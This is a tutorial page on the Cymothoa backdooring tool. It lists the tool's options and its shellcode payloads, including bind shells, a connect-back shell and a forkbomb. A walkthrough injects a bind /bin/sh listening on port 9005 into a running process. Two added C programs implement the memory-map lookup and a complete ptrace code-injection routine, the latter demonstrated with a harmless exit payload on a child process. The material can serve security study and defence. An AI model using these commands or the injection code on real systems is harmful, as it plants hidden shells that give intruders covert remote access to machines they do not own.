Cymothoa

Description

Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. It uses the ptrace system call (available on nearly all *nix systems) to attach to a running process, write the shellcode into one of the process's existing memory mappings and redirect execution to it. Because the payload lives only in the infected process's memory, it writes no new file to disk, but it also disappears when that process exits and survives neither a service restart nor a reboot.

Usage

Syntax

cymothoa -p <pid> -s <shellcode_number> [options]

Options

Main options:
	-p	process pid
	-s	shellcode number
	-l	memory region name for shellcode injection (default /lib/ld)
	  	search for "r-xp" permissions, see /proc/pid/maps...
	-m	memory region name for persistent memory (default /lib/ld)
	  	search for "rw-p" permissions, see /proc/pid/maps...
	-h	print this help screen
	-S	list available shellcodes

Injection options (override the payload's default flags):
	-f	fork parent process
	-F	don't fork parent process
	-b	create payload thread (you probably also need -F)
	-B	don't create payload thread
	-w	pass persistent memory address
	-W	don't pass persistent memory address
	-a	use alarm scheduler
	-A	don't use alarm scheduler
	-t	use setitimer scheduler
	-T	don't use setitimer scheduler

Payload arguments:
	-j	set timer (seconds)
	-k	set timer (microseconds)
	-x	set the IP
	-y	set the port number
	-r	set the port number 2
	-z	set the username (4 bytes)
	-o	set the password (8 bytes)
	-c	set the script code (ex: "#!/bin/sh\nls; exit 0")
	  	escape sequences such as \n are passed through literally, not interpreted...
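
The -l and -m options above pick a mapping by name out of /proc/<pid>/maps, and the permission string decides whether it is usable for code ("r-xp") or for the persistent data area ("rw-p"). The C program below, added here as an illustration and not part of cymothoa, parses maps lines and performs that lookup; the substring match on the mapping path and the constructed sample listing are this example's assumptions. Note that a name such as the default "/lib/ld" only matches when the loader's path as shown in maps actually contains that substring, so look at the target's maps file and pass -l and -m explicitly when it does not.

```c
/* maps_region.c: the lookup behind cymothoa's -l / -m options, which name a
 * mapping in /proc/<pid>/maps and require "r-xp" (code) or "rw-p" (data).
 * Added example, not the tool's own code. */
#include <stdio.h>
#include <string.h>

struct region {
    unsigned long start, end, offset;  /* address range and file offset */
    char perms[5];                     /* e.g. "r-xp" */
    char path[256];                    /* backing file, "[stack]", or "" */
};

/* Constructed sample modelled on /proc/<pid>/maps (not a real capture). */
static const char SAMPLE_MAPS[] =
    "00400000-00452000 r-xp 00000000 08:01 1234   /usr/bin/victim\n"
    "00651000-00652000 rw-p 00051000 08:01 1234   /usr/bin/victim\n"
    "7f1c2e800000-7f1c2e823000 r-xp 00000000 08:01 5678   /lib/x86_64-linux-gnu/ld-2.19.so\n"
    "7f1c2ea22000-7f1c2ea23000 r--p 00022000 08:01 5678   /lib/x86_64-linux-gnu/ld-2.19.so\n"
    "7f1c2ea23000-7f1c2ea24000 rw-p 00023000 08:01 5678   /lib/x86_64-linux-gnu/ld-2.19.so\n"
    "7fff075b8000-7fff075d9000 rw-p 00000000 00:00 0      [stack]\n";

/* Parse one maps line; the path is optional (anonymous mappings have none). */
int parse_maps_line(const char *line, struct region *r) {
    r->path[0] = '\0';
    int n = sscanf(line, "%lx-%lx %4s %lx %*s %*s %255s",
                   &r->start, &r->end, r->perms, &r->offset, r->path);
    return n >= 4;
}

/* First mapping whose path contains `name` and whose permissions equal `perms`.
 * Substring matching on the path is this example's choice; the help text only
 * says "memory region name". Returns 1 and fills *out, or 0 if none matches. */
int find_region(const char *maps, const char *name, const char *perms, struct region *out) {
    for (const char *p = maps; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < 511 ? full : 511;
        char line[512];
        memcpy(line, p, len);
        line[len] = '\0';
        struct region r;
        if (parse_maps_line(line, &r) && strcmp(r.perms, perms) == 0 && strstr(r.path, name)) {
            *out = r;
            return 1;
        }
        p = nl ? nl + 1 : p + full;
    }
    return 0;
}

/* Read a whole text file (e.g. /proc/self/maps) into buf; returns bytes read. */
size_t read_text(const char *path, char *buf, size_t cap) {
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return n;
}

static void show(const char *maps, const char *name, const char *perms) {
    struct region r;
    if (find_region(maps, name, perms, &r))
        printf("%s %-8s %lx-%lx (file offset %lx) %s\n",
               perms, name, r.start, r.end, r.offset, r.path);
    else
        printf("%s %-8s no match\n", perms, name);
}

int main(void) {
    static char maps[1 << 16];
    puts("sample listing:");
    show(SAMPLE_MAPS, "/lib/ld", "r-xp");   /* the default name: no match in this layout */
    show(SAMPLE_MAPS, "ld-", "r-xp");       /* what -l would have to be for this layout */
    show(SAMPLE_MAPS, "ld-", "rw-p");       /* candidate for -m */
    if (read_text("/proc/self/maps", maps, sizeof maps)) {
        puts("this process:");
        show(maps, "ld-", "r-xp");
        show(maps, "ld-", "rw-p");
    }
    return 0;
}
```

The sample deliberately uses a loader path that does not contain "/lib/ld", because that is the common case on distributions that put the loader under an architecture-specific directory; the program prints no match for the default and a hit for "ld-".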

Payloads

cyborg@cyborg:~$ sudo cymothoa -S
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink)
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via udp

Example

Creating a Cymothoa backdoor

Find the PID of the target process. It must be a user-space process that you are allowed to ptrace (as root, or as the process owner where the kernel's ptrace restrictions permit it); kernel threads, the bracketed entries in the listing below, cannot be attached to. The listing is truncated here; the target injected in the next step is PID 2269:

cyborg@cyborg:~$ ps -ax
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:02 /sbin/init
    2 ?        S      0:00 [kthreadd]
    3 ?        S      0:00 [ksoftirqd/0]
    5 ?        S<     0:00 [kworker/0:0H]
    7 ?        S      0:06 [rcu_sched]
    8 ?        S      0:00 [rcuos/0]
    9 ?        S      0:00 [rcuos/1]
   10 ?        S      0:00 [rcuos/2]
   11 ?        S      0:00 [rcuos/3]
   12 ?        S      0:00 [rcu_bh]
   13 ?        S      0:00 [rcuob/0]
   14 ?        S      0:00 [rcuob/1]
   15 ?        S      0:00 [rcuob/2]
   16 ?        S      0:00 [rcuob/3]
   17 ?        S      0:00 [migration/0]
   18 ?        S      0:00 [watchdog/0]
   19 ?        S      0:00 [watchdog/1]
   20 ?        S      0:00 [migration/1]
   21 ?        S      0:00 [ksoftirqd/1]
   23 ?        S<     0:00 [kworker/1:0H]
   24 ?        S<     0:00 [khelper]
   25 ?        S      0:00 [kdevtmpfs]

Inject the backdoor. Here -s 0 selects payload 0 (bind /bin/sh to a port), -p 2269 is the target PID and -y 9005 is the port the shell will listen on:

cyborg@cyborg:~$ sudo cymothoa -s 0 -p 2269 -y 9005
[+] attaching to process 2269

 register info: 
 -----------------------------------------------------------
 eax value: 0xfffffffffffffdfe	 ebx value: 0x3
 esp value: 0x7fff075d6298	 eip value: 0x7fba32bf9913
 ------------------------------------------------------------

[+] new esp: 0x7fff075d6290
[+] payload preamble: fork
[+] injecting code into 0x00f40000
[+] copy general purpose registers
[+] detaching from 2269
[+] infected!!!

Once the tool reports infected, the process with PID 2269 is listening on tcp/9005 and a plain TCP connection to that port gives a /bin/sh; the backdoor is gone as soon as that process exits. The register dump uses 32-bit names (eax, esp, eip) but holds 64-bit values, so the target is a 64-bit process. The eax value 0xfffffffffffffdfe is -514 (ERESTARTNOHAND), which shows the target was stopped inside an interrupted system call, the usual state of a process that is blocked in a read or a sleep when it is attached to.
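
What the tool did between attaching and detaching is the standard ptrace injection sequence: stop the target, save its registers, write code into an executable mapping, point the instruction pointer at it and resume. The C program below, added here as an illustration and not cymothoa's own code, performs that sequence against a child process it forks itself (so that a Yama ptrace_scope of 1 still permits the attach). It differs from the real tool in two labelled ways: the payload is a stand-in that makes the victim call exit_group(42) instead of a bind shell, and it overwrites the code at the target's current rip rather than a region named with -l. The two-NOP pad exists because a tracee stopped inside a restartable system call (the eax value 0xfffffffffffffdfe, i.e. -514, in the register dump above is exactly that state) has its instruction pointer rewound by two bytes when it resumes. The register names are x86_64-only; on other architectures the program compiles but reports ENOSYS.

```c
/* ptrace_inject.c: the attach / save-registers / write-code / redirect-rip
 * sequence behind "cymothoa -p <pid>". Added example, not the tool's code;
 * x86_64 Linux only. */
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in payload (not a shell): exit_group(code). The two leading NOPs absorb
 * the kernel's syscall-restart rewind (rip -= 2) that is applied when the
 * tracee was stopped inside a restartable system call. Encoding:
 *   90 90              nop; nop
 *   b8 e7 00 00 00     mov eax, 231  (SYS_exit_group on x86_64)
 *   bf <imm32>         mov edi, code (patched below, the way -y patches a port)
 *   0f 05              syscall                                               */
size_t build_payload(uint8_t *buf, int32_t code) {
    static const uint8_t tmpl[] = {0x90, 0x90, 0xb8, 0xe7, 0, 0, 0,
                                   0xbf, 0, 0, 0, 0, 0x0f, 0x05};
    memcpy(buf, tmpl, sizeof tmpl);
    memcpy(buf + 8, &code, 4);          /* imm32 of "mov edi", little-endian */
    return sizeof tmpl;
}

/* A tracee stopped inside an interrupted syscall reports -ERESTARTSYS (512) ..
 * -ERESTART_RESTARTBLOCK (516) in rax; 0xfffffffffffffdfe is -514. */
int in_restartable_syscall(long rax) {
    return rax <= -512 && rax >= -516;
}

#if defined(__x86_64__) && defined(__linux__)
/* Attach, write the payload over the code at the current rip (an r-xp page:
 * POKETEXT forces copy-on-write, so page protections do not stop it), point
 * rip at it and detach. Returns 0 on success, -1 with errno set otherwise. */
int inject(pid_t pid, const uint8_t *code, size_t len) {
    struct user_regs_struct regs;
    int status;
    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) return -1;
    if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status)) return -1;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) return -1;
    unsigned long addr = regs.rip;
    for (size_t off = 0; off < len; off += sizeof(long)) {
        size_t n = len - off < sizeof(long) ? len - off : sizeof(long);
        long word = 0;
        if (n < sizeof(long)) {            /* keep the bytes past the payload */
            errno = 0;
            word = ptrace(PTRACE_PEEKTEXT, pid, (void *)(addr + off), NULL);
            if (word == -1 && errno) return -1;
        }
        memcpy(&word, code + off, n);
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + off), (void *)word) == -1)
            return -1;
    }
    regs.rip = addr + 2;                   /* past the NOPs; a rewind lands on them */
    regs.rsp = (regs.rsp - 128) & ~0xfUL;  /* below the red zone, 16-byte aligned */
    if (ptrace(PTRACE_SETREGS, pid, NULL, &regs) == -1) return -1;
    return ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1 ? -1 : 0;
}
#else
int inject(pid_t pid, const uint8_t *code, size_t len) {
    (void)pid; (void)code; (void)len;
    errno = ENOSYS;                        /* register layout above is x86_64-only */
    return -1;
}
#endif

/* Demo: fork a victim parked in pause() (a restartable syscall, like the page's
 * target), inject, and show that the victim now exits with the payload's code. */
int main(void) {
    pid_t victim = fork();
    if (victim == 0) { for (;;) pause(); }
    usleep(100 * 1000);                    /* let the child reach pause() */
    uint8_t code[32];
    size_t len = build_payload(code, 42);
    if (inject(victim, code, len) == -1) {
        perror("inject");                  /* EPERM: ptrace denied (Yama/seccomp) */
        kill(victim, SIGKILL);
        return 1;
    }
    int status;
    waitpid(victim, &status, 0);
    printf("victim exit status: %d (expected 42)\n",
           WIFEXITED(status) ? WEXITSTATUS(status) : -1);
    return 0;
}
```

Two things carry over directly to reading cymothoa's output: "new esp" is the same stack-pointer move done here before SETREGS, and "copy general purpose registers" is the SETREGS step that hands the modified register set back to the target before detaching.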
©2017 Ztrela Knowledge Solutions Pvt. Ltd
